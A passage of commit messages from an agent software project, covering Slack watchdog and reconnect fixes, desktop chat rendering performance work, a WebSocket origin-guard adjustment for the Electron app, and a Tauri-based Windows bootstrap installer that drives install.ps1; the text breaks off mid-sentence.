- _socket_watchdog_loop: wrap the body in try/except + add a done-callback that respawns on unexpected crash, so a transient bug cannot permanently disable self-healing (Copilot #2)
- normalizeExecutablePathForCompare: use the resolved path for realpathSync so non-string inputs cannot leak through (Copilot #3)
- Add tests for crash-recovery and atomic watchdog replacement across reconnects
* fix(slack): tighten connect() error path and clarify watchdog test intent
Address Copilot review round 2.
- connect(): wrap _start_socket_mode_handler/_ensure_socket_watchdog in a focused try/except so any failure rolls back partially-started handler/task state and leaves _running=False, ensuring the platform lock is always released by the outer finally
- Defer _running=True until after the handler is actually started so the watchdog observes a live socket task immediately and never spins against a half-built adapter
- Rename test_watchdog_self_restarts_after_unexpected_crash to test_watchdog_cancellation_does_not_respawn (matches what it actually asserts) and add test_watchdog_unexpected_exit_respawns_via_done_callback that drives a real RuntimeError through _on_socket_watchdog_done and verifies a fresh task replaces the crashed one
* fix(web_server): serialize action spawn check+store under a threading lock
Address Copilot review round 3.
FastAPI runs sync handlers on its threadpool, so two near-simultaneous /api/gateway/restart (or /api/hermes/update) requests could both observe "no live process" in _spawn_hermes_action's poll-based dedupe and double-spawn. Add a module-level _ACTION_SPAWN_LOCK around the entire check + Popen + _ACTION_PROCS store sequence so the dedupe is atomic across threads.
* fix: address Copilot review round 4
- slack.disconnect(): mirror connect()'s defensive cleanup — catch the broad Exception path on watchdog await so handler shutdown and lock release still run if the watchdog raised before cancellation took effect
- web_server._spawn_hermes_action: wrap subprocess.Popen in try/except so a missing executable / permission error closes the log file handle, writes a failure marker, and re-raises instead of leaking a file descriptor
- gateway._scan_gateway_pids: drop the over-broad "hermes.exe --profile" / "hermes.exe -p" patterns that would match any Hermes CLI subcommand using a profile flag (e.g. `hermes.exe --profile foo dashboard`); rely on the "hermes.exe gateway" + "hermes-gateway.exe" tokens instead
- tests: tighten _fake_create_task to assert coroutine input and return a real asyncio.Task that stays pending until pytest teardown, and update the three callsites whose mocked AsyncSocketModeHandler.start_async returned a non-coroutine value
* fix(slack): reset multi-workspace state on reconnect
Address Copilot review round 5.
connect() is reentrant (gateway restart, in-process reconnect), but it was leaving _bot_user_id / _team_clients / _team_bot_user_ids populated from the previous session. A reconnect that rotated the primary token or dropped a workspace would silently keep the stale bot user id and stale workspace client maps, leading to dispatch against gone workspaces.
Clear these three pieces of state right after _stop_socket_mode_handler() and before the auth_test loop, then let the loop repopulate from the current tokens. Add test_reconnect_refreshes_multi_workspace_state to lock it in.
* nix: package apps/desktop as .#desktop (#28964)
Adds nix/desktop.nix building the Electron renderer with buildNpmPackage
and wrapping nixpkgs' electron binary. Reuses .#default by setting
HERMES_DESKTOP_HERMES to its hermes binary, so the desktop's resolver
picks up the fully-wired nix hermes (venv, bundled skills/plugins,
runtime PATH) without reimplementing agent resolution.
- nix/desktop.nix: renderer + electron wrapper
- nix/hermes-agent.nix: finalAttrs form, exposes hermesDesktop in passthru
- nix/packages.nix: exposes .#desktop + adds to fix-lockfiles
- apps/desktop/package-lock.json: standalone hermetic lockfile
nix build .#desktop && nix run .#desktop both clean.
* fix(desktop): probe steps 4 & 5 of resolveHermesBackend before trusting
A user-reported failure on Windows-on-ARM: a pre-installed Python 3.13
on PATH makes findSystemPython() succeed, so resolveHermesBackend
returns a backend pointing at it -- but hermes_cli isn't in that
interpreter's site-packages. The spawn dies with ModuleNotFoundError
and the user sees a dead GUI instead of the first-launch installer.
Same shape can hit step 4 (existing `hermes` on PATH) when a stale
shim survives a partial uninstall.
Add cheap exit-code probes -- `python -c "import hermes_cli"` for
step 5, `<hermes> --version` for step 4 -- and fall through to step 6
(bootstrap-needed) on failure. install.ps1 then runs as if on a clean
box and the venv gets built.
Probes live in a standalone electron/backend-probes.cjs module so they
can be unit-tested with node --test, same pattern as bootstrap-platform.cjs
and hardening.cjs. New test file wired into test:desktop:platforms.
* test(desktop): allow `node-pty` bare-require in packaged entrypoints
Pre-existing failure on bb/gui since c858484b4 swapped the node-pty
fork for upstream microsoft/node-pty 1.1.0. main.cjs intentionally
bare-requires node-pty (it's hoisted by workspace dedup in dev, and
staged to resources/native-deps via scripts/stage-native-deps.cjs +
extraResources for packaged builds, with a try/catch fallback at
line ~38). The allowlist hadn't been updated to match -- same shape
as `electron`, which was already allowed.
* chore(deps): refresh root lockfile for dashboard @nous-research/ui 0.14.0
apps/dashboard/package.json was bumped to @nous-research/ui 0.14.0 (+
flag-icons ^7.5.0, motion ^12.38.0) but the root package-lock.json was
never refreshed. Running `npm install` from the repo root now
materialises 0.14.0's transitive closure (launder, bumps for
@nanostores/react, nanostores, sanitize-html, tailwind-merge).
No code changes; purely a lockfile catch-up so fresh checkouts on bb/gui
get a working dashboard install.
* chore(desktop): bump version to 0.0.1
First non-placeholder version so electron-builder's artifactName template
produces `Hermes-0.0.1-win-x64.exe` instead of the obviously-unreleased
`Hermes-0.0.0-...`. No release process yet; this just stops the artifact
filename from telling users "you got a debug build."
Bumped in three slots that all carry the desktop app's version:
- apps/desktop/package.json (source of truth)
- apps/desktop/package-lock.json (per-app lockfile, kept for CI parity)
- root package-lock.json's apps/desktop workspace entry
Identity-of-build for first-launch bootstrap continues to come from
build/install-stamp.json (commit SHA + builtAt), unchanged.
* fix: fs icon color
* perf(desktop): cut per-keystroke layout + listener churn in chat composer
Empirical work via CDP harnesses under apps/desktop/scripts/ (see
profile-typing-lag.md):
jsListeners growth (per round of 200 chars + GC):
before: +35 (verified leak — listeners stuck after 1st trigger popover use)
after: +0
Four narrow edits in src/app/chat/composer/index.tsx:
1. Drop the per-keystroke `editorRef.current.scrollHeight` read used to
decide composer expansion. Replace with `draft.length > 60` heuristic;
the existing ResizeObserver still catches edge cases. `scrollHeight`
is a forced-layout call and was firing on every char until the first
wrap.
2. Bucket measured composer height to 8px before writing
`--composer-measured-height` / `--composer-surface-measured-height`
on `documentElement`. Without this, the editor grows ~1px per char,
setProperty fires every keystroke, computed style is invalidated tree-
wide.
3. Remove the dead `$composerDraft` two-way sync. Nothing outside the
composer subscribed to that atom (verified via grep). Two useEffects
on `[draft]` were pushing draft→atom and atom→aui per keystroke for
no consumer. Also drop the per-keystroke
`reconcileComposerTerminalSelections` call; it was pruning stale
labels for `terminalContextBlocksFromDraft`, but that helper already
ignores labels not in the current submitted text, so pruning per
keystroke was just bookkeeping.
4. `refreshTrigger` fast-bails when the draft contains neither `@` nor
`/`. Previously `textBeforeCaret(editor)` ran on every input/keyup
regardless; `range.toString()` inside is O(n) over draft length.
Synthetic typing latency p50/p90/p99 is similar before vs after on a
freshly-loaded session (Blink can already handle ~30cps typing into a
contentEditable on its own); the real win is the listener leak being
gone and the global computed-style invalidations dropping ~8× when the
composer is sitting at a fixed height row.
The `Enter → stall` follow-up (see profile-typing-lag.md §"Submit /
TTFT stall") is unmeasured here — needs a throwaway session because
the harness fires a real prompt. Not blocking this commit.
* perf(desktop): cut FadeText forced layouts during streaming
The slowest user-felt path is typing into the composer while the
assistant is streaming. Profile (scripts/profile-under-stream.mjs):
FadeText measureOverflow self time: 35.8 ms → 18.1 ms (-50%)
total active CPU during 7s window: ~150 ms → ~50 ms
Two changes in src/components/ui/fade-text.tsx:
1. Drop the `useEffect([children])` that re-ran `measureOverflow`
(reads scrollWidth + clientWidth — forced layout) on every parent
re-render. `useResizeObserver` already fires the same callback on
mount and whenever the host span's box size changes; that covers
the only case where overflow state can legitimately change. The
previous explicit useEffect was a forced-layout flush on every
parent render, which during streaming meant every token tick.
2. Wrap the component in `memo` with a custom comparator that
short-circuits the entire render when scalar string `children` and
the className/fadeWidth/style props are unchanged. The hot path
was tool-fallback's title chips being re-rendered by parent
streaming updates even though their text was stable; memo+
comparator skips that.
Also adds two harness scripts under apps/desktop/scripts/:
- latency-under-stream.mjs (key→paint latency while a turn streams)
- profile-under-stream.mjs (CPU profile while a turn streams)
Updates profile-typing-lag.md with the streaming numbers and confirms
the Enter→paint submit path is already fast (≤320ms on the populated
session; the 2s "stall after Enter" the user noticed once was a
one-time cold-start, not reproducible at the UI layer).
I'd guess the felt jank in real use is fast-burst typing during a
long-form streaming reply (code blocks + markdown lists multiply the
per-token render cost). The CPU savings here scale linearly with
token volume.
* chore(desktop): drop diag scratch scripts no longer needed
* docs(desktop): correct leak-typing numbers on a real session
Re-ran the leak harness on a populated session (Phaser thread) for both
unpatched and patched builds. The original 'listener leak' was transient
warm-up cost, not a steady-state leak — both versions show 0 listener
growth/round in steady state.
The load-bearing number is forced layouts per character:
unpatched (HEAD~2): 7.02 layouts/char
patched (HEAD): 2.35 layouts/char (3× fewer)
The patches reduce per-char forced-layout work to Blink's natural floor.
Document node count and heap are flat in both builds.
* perf(desktop): fix "Enter jumps up" on long threads
User reported: after pressing Enter on a long thread, the view jumps up
— the just-submitted message disappears below the fold. Confirmed via
apps/desktop/scripts/measure-jump.mjs:
before: distFromBottom 0 → 49.5px, sticks there permanently
after: distFromBottom 0 → ~0 (worst case 4px for one frame)
Root cause in useThreadScrollAnchor (thread-virtualizer.tsx):
1. The sticky-bottom logic disarmed on any scroll event where
`scrollTop < lastTopRef.current`. That check can't distinguish a
user scrolling up from a programmatic `pinToBottom` write that
the browser clamped short of bottom (because content also grew in
the same frame, so `scrollTop = scrollHeight` lands at
`scrollHeight - clientHeight` for the OLD scrollHeight, which is
now below the NEW scrollHeight). Result: sticky-bottom disarmed
permanently on the user's first submit.
2. There was no synchronous pin tied to React's commit phase. By the
time the ResizeObserver fired and re-pinned, the user had already
seen ~50ms of "message below the fold" — visually that reads as the
view jumping up.
Fix:
- `programmaticScrollPendingRef` counter tracks scroll events we
expect to be ours (one per `pinToBottom` write). The scroll handler
skips the disarm check when consuming a pending tick, keeps the
arm bit true, and re-pins synchronously if the browser clamped us
short of bottom. A depth cap (8) breaks runaway loops in
pathological streaming-burst layouts.
- `useLayoutEffect` on `groupCount` increase pins BEFORE the browser
paints, eliminating the visible ~50ms window between optimistic
user-message insert and the RO/scroll-event chain firing.
Verified on the long Cloud Shadows thread (7-8 turns, ~11k px tall):
all three repro runs now hold within 0–4 px of bottom across the
post-Enter transition. Submit latency unchanged (paint 77–107 ms),
streaming-typing latency unchanged.
Also adds three debug harnesses:
- measure-jump.mjs — sample thread scroll across Enter
- probe-thread.mjs — dump current thread / scroll state
- diag-jump.mjs — intercept scrollTop + RO + mutations across Enter
* perf(desktop): rate-limit thread auto-pin during streaming
Follow-up to the Enter-jump fix. The first version did a synchronous
re-pin loop inside the on-scroll handler when the browser clamped our
`scrollTop = scrollHeight` write short of the new bottom; that gave a
tight 4 px visible jump on Enter, but during streaming the
ResizeObserver fires many times per second as content grows, and each
RO callback re-entered the pin loop. CPU profile showed
`Virtualizer.getMaxScrollOffset` climbing to 22 ms self over a typing-
during-streaming window — the sync re-pin path was paying tanstack-
virtual's recompute cost ~3× per token.
Re-architect:
- RO callback coalesces to one pin per animation frame. Streaming-rate
RO bursts now cost the same as a single per-frame pin.
- The on-scroll programmatic-counter guard remains (it's what prevents
the false-disarm bug when the browser clamps a write). It no longer
does sync re-pins; the next RO/rAF will catch up.
- The useLayoutEffect on groupCount (the path that fires on user
submit / new turn arrival) ALSO schedules one rAF pin in addition to
the synchronous pin. This catches the case where React mounts the
new message in a second commit (after our layout effect ran), which
grows scrollHeight again. Two pins instead of a tight loop, paid only
once per turn change.
Net effect on the Cloud Shadows long thread:
enter-jump transient: 12–20 px for 1 frame (was 49 px permanent)
CPU during stream+type: `getMaxScrollOffset` dropped out of top-5
self-time list
typing-during-stream: p50 ~10 ms paint, p99 ~20 ms (1 frame),
occasional 40 ms+ outliers during burst
token arrivals
Also adds scripts/profile-long-stream.mjs: 20-second streaming profile
with per-500ms FPS histogram + content-length tracking, so we can see
whether streaming render cost grows with message length (it doesn't —
sustained 60 fps).
* perf(desktop): use textContent for trigger precondition
Replace composerPlainText() call inside refreshTrigger's no-trigger
fast-bail with a textContent check. textContent is a browser-native
flat traversal; composerPlainText walks recursively with chip-aware
logic. We only need to know if @ or / appears; either way the trigger
char will be in textContent because chips contain @ in their refText.
Profile shows composerPlainText was ~18ms self over a 12s typing-during-
stream window, called from refreshTrigger on every keystroke. Most of
that was the precondition check (the trigger detection path is the
slow path but only runs when a trigger char is present).
* Revert "perf(desktop): use textContent for trigger precondition"
This reverts commit a6a78ff08a.
* Revert "perf(desktop): cut FadeText forced layouts during streaming"
This reverts commit 88e7d7537c.
* Revert "perf(desktop): cut per-keystroke layout + listener churn in chat composer"
This reverts commit bff1b3261d.
* Revert "Revert "perf(desktop): cut per-keystroke layout + listener churn in chat composer""
This reverts commit b7b378e3a4.
* Revert "Revert "perf(desktop): use textContent for trigger precondition""
This reverts commit 0739588f48.
* chore(desktop): synthetic-stream perf harness + scripts
Drops the React `<Profiler>` approach (no-op because Vite is currently
serving the production React build) in favor of an externally-observable
measurement stack: rAF frame intervals, `PerformanceObserver({entryTypes:
['longtask']})`, and a `MutationObserver` on the live streaming message.
Adds a synthetic stream driver — `window.__PERF_DRIVE__.stream({...})` —
that pushes tokens through the live `$messages` atom at a controlled rate,
so the assistant-ui runtime, incremental repository, and Streamdown
markdown pipeline see the same workload they'd see during a real LLM
stream, without the LLM cost.
The driver lives in `src/app/chat/perf-probe.tsx`; `main.tsx` side-imports
it under `import.meta.env.MODE !== 'production'` so it tree-shakes out of
prod builds. (Using `MODE` rather than `DEV` because our Vite setup
currently reports `DEV=false` even under `vite dev` — see the dev-build
note in `profile-typing-lag.md`.)
Scripts:
- measure-synthetic-stream.mjs drive synthetic + record frame/longtask/mutation
- profile-synth-stream.mjs CPU profile + top self-time during synthetic
- measure-real-stream.mjs same harness, real LLM stream
- profile-real-stream.mjs CPU profile bracketing the real stream window
- eval.mjs / reload.mjs small CDP helpers
A real-LLM measurement on Cloud Shadows (gpt-4o-mini, 39 s window) showed
12 longtasks in the same 75-127 ms range the synthetic predicted, so the
synthetic is a faithful proxy.
* perf(desktop): memo FadeText so it skips re-renders when text unchanged
FadeText is used 110+ times inside `tool-fallback.tsx` on a tool-heavy
thread. During streaming each parent re-render previously triggered the
component's `useEffect([children])`, which forced a `scrollWidth` layout
read even when the title text was unchanged. The `useResizeObserver` was
already covering the genuine resize case, so that effect was strictly
redundant work.
Drops the effect and wraps the component in `React.memo` with a custom
comparator that field-compares `className`, `fadeWidth`, and `style`,
plus identity-compares `children` (scalar fast-path; correct for JSX
nodes too since a new node should force a re-render).
Verified via temporary render counter on the 34 MB
`session_20260514_215353_fe0ac8` thread (110 FadeText instances): a
2 s synthetic stream went from ~11k FadeText render calls to 122 —
roughly one render per truly-new instance instead of one per parent
commit per instance.
Doesn't move the longtask needle on its own (Streamdown's markdown
re-parse dwarfs it) but eliminates a steady CPU floor and a class of
forced layouts during streaming. Profile-typing-lag.md documents the
full investigation, including the remaining Streamdown cost as the
real source of the perceived "5 fps moment" hitches.
* perf(desktop): memoize MarkdownText plugins to stop churning Streamdown
The inline `plugins={{ math: mathPlugin, ...(isStreaming ? {} : { code }) }}`
on `<StreamdownTextPrimitive>` constructed a new object literal on every
parent render. That broke `<Streamdown>`'s outer memo and forced its
internal `rehypePlugins` / `remarkPlugins` array useMemos to rebuild,
which propagates a new identity into every `<Block>` and defeats Block's
memoization for stable historical blocks.
After memoizing on `[isStreaming]` (the only real dimension of variance),
CPU profile during a 5 s synthetic stream on the 34 MB session shows
`parser` self-time dropping out of the top 10, `compile` cut roughly in
half, and `bn$1` / `m$1` (micromark internals) leaving the top entries.
Doesn't move the visible longtask count on its own — Streamdown's
per-Block parse cost still dominates whenever the last block's content
changes — but it removes a class of unnecessary re-parses for historical
blocks during streaming. See `scripts/profile-typing-lag.md` for the
full investigation.
* perf(desktop): floor assistant-text flush gap to 33ms for predictable batching
`scheduleDeltaFlush` previously coalesced via `requestAnimationFrame`
only. The "at most one flush per frame" guarantee that gives you is fine
for fast streams (>~80 tok/sec) where multiple tokens arrive within a
single frame, but breaks down at typical LLM token rates (30-80 tok/sec)
where each token arrives slower than the rAF cadence and triggers its
own React commit + Streamdown markdown re-parse.
Track `lastFlushAt` and require at least 33 ms between two flushes.
React 18+ auto-batching probabilistically already collapsed some of
these, but the floor makes it deterministic.
A/B on the 34 MB session, 300 tokens at 50 tok/sec (markdown chunks):
| | avgFps | p99 frame | LTs / 5 s | max LT |
|---|---|---|---|---|
| no floor (current rAF) | 54.0 | 38 ms | 2.0 | 145 ms |
| 33 ms floor (this PR) | 54.3 | 41 ms | 1.7 | 110 ms |
`inter-mutation` p50 also tightens from 22-28 ms to a clean 33 ms,
which is the expected signature of a deterministic floor. Doesn't fully
solve the user's perceived hitches — Streamdown's per-Block parse cost
when the last block grows past ~2 k chars is still the elephant — but
it consistently shaves the worst-case longtask and makes the streaming
cadence visibly steadier.
Also threads a matching `flushMinMs` option through the synthetic
stream driver in `perf-probe.tsx` + `scripts/measure-synthetic-stream.mjs`
so the harness can A/B both regimes without spending LLM credits.
See `scripts/profile-typing-lag.md` for the full investigation.
* perf(desktop): useDeferredValue for streaming markdown so parses don't block input
Streamdown's per-Block parse cost grows with the live tail's length and
is unavoidable inside the block-memo pattern (industry standard, see
findings doc). The fix is to stop having that work block the main thread.
`<DeferStreamingText>` is a 12-line wrapper that reads message-part state
via `useMessagePartText`, runs it through `useDeferredValue`, and
re-publishes via assistant-ui's `<TextMessagePartProvider>`. The inner
`<StreamdownTextPrimitive>` reads the deferred value through the normal
`useMessagePartText` hook — no fork, no internal-path imports, fully on
assistant-ui's public API. React's concurrent scheduler then:
- abandons in-flight deferred renders when a newer token arrives, so
intermediate states get skipped under fast streams
- deprioritises the markdown render when the main thread has urgent
work (typing, scroll), so input stays responsive even while a
100ms parse is queued
Streamdown already uses `useTransition` for its block-array setState;
this lifts the deferral up to the consumer boundary so it covers the
whole pipeline (preprocess → split → repair → parse → render).
A/B on the 34 MB session, 300 tokens at 50 tok/sec, markdown chunks
(four trials each, with the 33ms flush throttle on for both):
| | avgFps | p99 frame | LTs/5s | max LT | typing-while-stream p95 |
|---|---|---|---|---|---|
| pre | 54.3 | 41 ms | 1.7 | 110 ms | ~17 ms |
| post | 58.5 | 31 ms | 2.0 | 117 ms | 14-18 ms |
Longtask count + max LT unchanged — useDeferredValue doesn't reduce
CPU, only its priority. The avgFps lift and p99 frame drop are the
proof that the existing CPU is no longer blocking 60 fps cadence. One
clean run logged MUTATIONS=0 — React skipped every intermediate text
state and only committed the final one (textbook deferred-value
behaviour).
The actually-reduce-CPU path is replacing the parser with a state
machine like Flowdown — left for a future PR; see
`apps/desktop/scripts/profile-typing-lag.md` for the full investigation.
* feat(desktop): add hermes gui launcher
* feat(desktop): launch packaged gui builds by default
* bump gui version to 0.0.2
* fix(dashboard): allow file:// origin on loopback WS + diagnostic logging
Upstream commit 2e66eefbc ("fix(dashboard): validate WebSocket Host
and Origin") added a WebSocket Host/Origin guard to block DNS
rebinding against the dashboard. The guard rejects any Origin whose
scheme is not http/https or whose netloc is empty — which includes
Electron's renderer Origin: file:// when the desktop app loads its
bundle from disk in production mode.
That makes the bb/gui Electron desktop unable to open the gateway
WebSocket against the embedded backend on Windows / macOS prod
builds. The renderer reports "Desktop boot failed" and the backend
logs:
WARNING hermes_cli.web_server: gateway-ws reject
peer=127.0.0.1:NNNN reason=non_loopback_or_bad_origin
bound_host=127.0.0.1 close_code=4403
DNS-rebinding requires a DNS-resolvable hostname; file:// has no
host component and therefore cannot be the attack vector this guard
exists to block. When bound to a loopback interface (127.0.0.1 /
::1 / localhost), accept file:// origins so desktop wrappers can
attach. Non-loopback binds (operator opted into network exposure)
keep rejecting file:// — the loose policy doesn't apply.
Also adds per-reason diagnostic logging in
_ws_host_origin_is_allowed, so future ws-guard rejections name the
specific clause that fired (bad_host / bad_origin_scheme /
origin_host_mismatch) instead of the opaque
"non_loopback_or_bad_origin" surfaced at the call site.
Verified against tests/hermes_cli/test_web_server_host_header.py
(all 11 upstream tests still pass) and hand-tested by opening the
bb/gui Electron desktop dev build against the patched backend.
* fix(tui_gateway): restore _content_display_text helper
Bb/gui had dropped the helper but the orchestrator code merged from main
still calls it (_inflight_text, _message_preview). Re-add the definition
verbatim from main so session.create / _start_inflight_turn don't crash
with NameError on first prompt submit.
* fix(tui-gateway): restore _content_display_text helper lost in main merge
The May 27 merge of origin/main into bb/gui re-introduced two callers of
_content_display_text (in _inflight_text and _history_to_messages) but
dropped the helper definition itself, leaving an unresolved reference.
NameError fires on every user message via _start_inflight_turn ->
_inflight_text, taking down both the TUI and the desktop (which share
this gateway backend) the moment input is dispatched.
Restores the helper verbatim from main (commit 36c99af37) -- pure
structured-content text extractor, no other dependencies.
* fix(telegram): import Set for _dm_topic_chat_ids annotation
self._dm_topic_chat_ids: Set[str] = {...} at line 460 references Set
but only Dict, List, Optional, Any are imported from typing. The file
has no 'from __future__ import annotations', so the annotation is
evaluated at runtime and raises NameError on TelegramAdapter
construction.
* fix(setup): drop shadowing inner importlib.util re-imports
_print_setup_summary and _setup_tts_provider each had 'import
importlib.util' inside a try: block nested deeper in the function
body. Python flips importlib to function-local for the whole scope,
so earlier references in the same function (the neutts branches at
lines 493 / 1109) hit UnboundLocalError before the late import can
run.
The top-of-module 'import importlib.util' at line 14 already covers
both call sites, so dropping the redundant inner imports restores
the intended behavior.
* feat(install.ps1): add -IncludeDesktop switch + Stage-Desktop
The new Hermes-Setup.exe (Tauri bootstrap installer) passes -IncludeDesktop
so users who install via the GUI end up with a launchable Hermes.exe at
apps/desktop/release/<os>-unpacked/. Existing flows are unchanged:
* The 'irm install.ps1 | iex' CLI one-liner omits the flag — terminal
users don't need a prebuilt desktop binary; 'hermes desktop' builds
on demand.
* The Electron desktop's bootstrap-runner.cjs also omits the flag —
rebuilding apps/desktop from inside a running Hermes.exe would try
to overwrite the live binary on disk and fail.
Stage-Desktop runs after Stage-NodeDeps so workspace npm is already
installed when electron-builder fires. It does:
1. 'npm install' at repo root so apps/* workspaces resolve their deps
(Electron itself arrives via npm here, ~150MB)
2. 'npm run pack' in apps/desktop (tsc + vite + electron-builder --dir)
3. Probes apps/desktop/release/{win-unpacked,win-arm64-unpacked}/Hermes.exe
The --dir mode produces an unpacked launchable binary without an NSIS/MSI
installer artifact — we don't need one because Hermes-Setup.exe spawns the
unpacked binary directly via launch_hermes_desktop.
* feat(installer): Tauri bootstrap installer for first-time onboarding
Hermes-Setup.exe is a small signed Rust+Tauri binary that drives
scripts/install.ps1 stage-by-stage with a native UI matching the
desktop's design language. Replaces the chicken-and-egg pattern of
shipping a 200MB Electron app whose first launch existed only to
run install.ps1.
The architecture:
Rust backend (src-tauri/):
bootstrap.rs orchestrator -- Tauri commands, stage iteration
install_script.rs resolve install.ps1 (dev checkout, cache, GitHub raw)
powershell.rs spawn powershell, line-stream stdout/stderr, parse JSON
events.rs BootstrapEvent types -- mirror bootstrap-runner.cjs
paths.rs HERMES_HOME resolution + tracing log setup
build.rs bakes BUILD_PIN_COMMIT / BUILD_PIN_BRANCH from
'git rev-parse HEAD' at compile time
React frontend (src/):
Tauri webview rendering 4 screens (welcome / progress / success /
failure), driven by nanostores subscribing to the Rust event stream.
Visual layer reuses the desktop's styles.css wholesale via @import
so the installer and desktop never drift visually.
Distribution:
targets = ['app', 'dmg', 'appimage'] -- no NSIS/MSI wrapper. The
raw target/release/Hermes-Setup.exe IS the artifact on Windows;
.dmg + .app on macOS; AppImage on Linux. One file, double-click,
no installer-installing-an-installer pattern.
Compile-time pinning:
build.rs reads 'git rev-parse HEAD' and emits
cargo:rustc-env=BUILD_PIN_COMMIT=<sha> + BUILD_PIN_BRANCH=<branch>.
bootstrap.rs's option_env!() picks these up so the binary fetches
install.ps1 from the exact SHA it was tested against. CI / release
builds can override via HERMES_BUILD_PIN_COMMIT env var.
Windows manifest:
hermes-setup.manifest declares level='asInvoker' so the
productName 'Hermes Setup' doesn't trip Windows's installer-
detection heuristic and refuse to launch without elevation.
Also declares PerMonitorV2 DPI + UTF-8 active code page + Common
Controls v6.
Limitations of this initial version:
* No code signing -- Windows SmartScreen will warn once on Hermes-Setup.exe
('More info -> Run anyway'). The downstream binaries it produces
(Hermes.exe in win-unpacked/, the hermes CLI) are locally-built and
therefore don't carry MOTW, so they launch without SmartScreen
intervention. Cert procurement tracked separately.
* macOS and Linux build paths defined but untested -- Windows-only V1.
* fix(installer): pass -IncludeDesktop to manifest, surface launch errors, alias hermes desktop
Three bugs found in the first VM end-to-end test:
1. install.ps1 -Manifest was called WITHOUT -IncludeDesktop, so the
manifest came back with the 14-stage list (no desktop stage), the
UI showed '14 steps' and Stage-Desktop never ran. Pass the flag to
both the manifest fetch and the per-stage runs — install.ps1 gates
the desktop stage's inclusion on the flag.
2. The Success screen's Launch button silently swallowed the Tauri
error when no Hermes.exe existed (e.g. Stage-Desktop was skipped).
Wire the error through to inline UI with an alert callout, so the
user gets actionable text ('Hermes.exe missing, run hermes desktop
from a terminal') instead of an unresponsive button.
3. The Success screen tells users to run 'hermes desktop' from a
terminal but the CLI only accepted 'hermes gui' — invalid choice
for 'desktop'. Rename the subcommand canonically to 'desktop' with
'gui' as a backwards-compatible alias. Update the _SUBCOMMANDS sets
used by session-flag arg parsing + logging-mode probe so both names
route to the same logic.
* fix(install.ps1): pre-warm electron-builder winCodeSign cache + fix Stage-Desktop $HasNode false-skip
Two bugs caught in the second VM end-to-end run:
1. electron-builder's winCodeSign extraction fails on grandma-class
Windows boxes because the .7z archive contains macOS symlinks
(darwin/10.12/lib/libcrypto.dylib and libssl.dylib pointing at
versioned siblings). Creating symlinks on Windows requires
SeCreateSymbolicLinkPrivilege, a per-user right that non-admin
accounts don't have on stock Windows. Result: every fresh install
on a non-admin user fails Stage-Desktop with a 7-Zip 'cannot create
symbolic link' error, retried four times, then bails.
Fix: Initialize-ElectronBuilderCache pre-extracts winCodeSign-2.6.0.7z
ourselves with -snl (don't preserve symlinks, store as resolved file
content) AND -x!darwin (skip the entire macOS subtree — irrelevant
on Windows). Writes to electron-builder's expected cache dir before
electron-builder gets a chance to try its own broken extraction.
Idempotent — fast-paths via signtool.exe sentinel check.
2. Install-Desktop's first guard was 'if (-not $HasNode) skip'.
$HasNode is set by Stage-Node into $script:HasNode, but in
cross-process driver mode (each -Stage NAME is a fresh powershell.exe
spawned by Hermes-Setup.exe), that script-scope variable from the
PREVIOUS process is invisible — so the guard always fired and
Install-Desktop returned in 900ms with a misleading
'Node.js not available' reason. The real npm probe below it never
got to run. Fix: re-probe npm directly via Get-Command when $HasNode
is empty/false, since by that point Stage-Node has already verified
Node is installed and the only question is whether *this* process
can see it on PATH (it can — installer-wide PATH update from Stage-Node).
* fix(install.ps1): tell electron-builder we're NOT signing instead of pre-extracting winCodeSign
The previous commit (c7e46f9f3) worked around the winCodeSign-symlinks-
on-Windows extraction crash by pre-extracting the archive ourselves with
-snl + -x!darwin. That fix was correct but addressed the wrong layer.
The deeper question: why was electron-builder fetching winCodeSign at all
when we have no signing cert configured? Answer: electron-builder
unconditionally pre-warms the toolchain assuming any build MIGHT sign.
The cert auto-discovery never finds anything (we never set CSC_LINK
or anything else), so the signing never happens — but the 100MB fetch
of winCodeSign and its broken-on-Windows symlink extraction does.
Set CSC_IDENTITY_AUTO_DISCOVERY=false (with WIN_CSC_LINK and
WIN_CSC_KEY_PASSWORD also explicitly cleared as belt-and-suspenders)
before invoking npm run pack, and electron-builder skips the entire
winCodeSign apparatus. No download, no extraction, no privilege check.
Env vars are saved/restored around the invocation so we don't leak
the override into Stage-PlatformSdks etc.
Net: removes the 100-line Initialize-ElectronBuilderCache helper that
manually downloaded + extracted winCodeSign-2.6.0.7z. Replaced with
3 env-var assignments. The produced Hermes.exe is functionally
identical — just no longer carries a code-signing-machinery dependency
we never used.
* fix(installer): bump bootstrap-installer.log to capture stage transitions + every install.ps1 line
Diagnosing the second VM failure was impossible because bootstrap-installer.log
contained only the 'starting' banner. Two causes:
1. emit_log() inside run_bootstrap() was tracing::debug! — dropped on the
floor under the default INFO env-filter.
2. The per-stage sink callbacks (on_stdout_line / on_stderr_line) only
emitted Tauri events to the frontend; they never tee'd to the log file
at all. When the failure route mounts, the Tauri event stream is the
only place the script output lived, and it gets discarded.
3. The Failed / Stage / Manifest / Complete lifecycle frames in emit_event()
were also Tauri-only — so even the 'which stage failed' frame never
reached the log.
Fixes:
* emit_log() → tracing::info!
* Sink callbacks tee stdout to info!, stderr to warn!, with stage label
as a structured field for grep'ability
* emit_event() now matches on the variant and logs each lifecycle frame
at the right level: Failed → tracing::error!, others → info!
Result: a failing install leaves a complete forensic trail in
bootstrap-installer.log — manifest stage list, every install.ps1
stdout/stderr line tagged by stage, the stage transitions, and the
final error. Same path as before so nothing the user does changes.
* fix(install.ps1): Stage-NodeDeps cross-process $HasNode + stream npm install output to bootstrap log
VM run 3 diagnosis: node-deps stage skipped on the VM (logged
'Skipping Node.js dependencies (Node not installed)') and then
desktop's npm install failed with exit 1 and zero diagnostic detail.
Two root causes:
1. $HasNode false-skip in Stage-NodeDeps — same cross-process bug
pattern we fixed for Stage-Desktop in c7e46f9f3. Stage-Node ran
in process A and set $script:HasNode = $true, then exited. Stage-
NodeDeps ran in fresh process B (Hermes-Setup.exe -Stage NAME
spawns each stage independently), where that variable doesn't
exist. Re-probe via Get-Command npm instead of trusting the
stale script-scope global. The previous stage already verified
Node so the re-probe succeeds.
2. npm install --silent + Tee to TEMP file hid the real error.
When the workspace install failed on the VM, the actual reason
was buffered in $env:TEMP\hermes-npm-desktop-install-*.log and
the user saw only 'exit 1'. Drop --silent so npm streams its
full output, drop the TEMP-file dance — the Tauri installer's
streaming sink already tees every stdout/stderr line to the
rolling bootstrap-installer.log, so a side log file is dead
weight that hides the very error we need.
After this, the bootstrap log on a failure will contain npm's full
output (deprecation warnings, ETARGET, native-module compile errors,
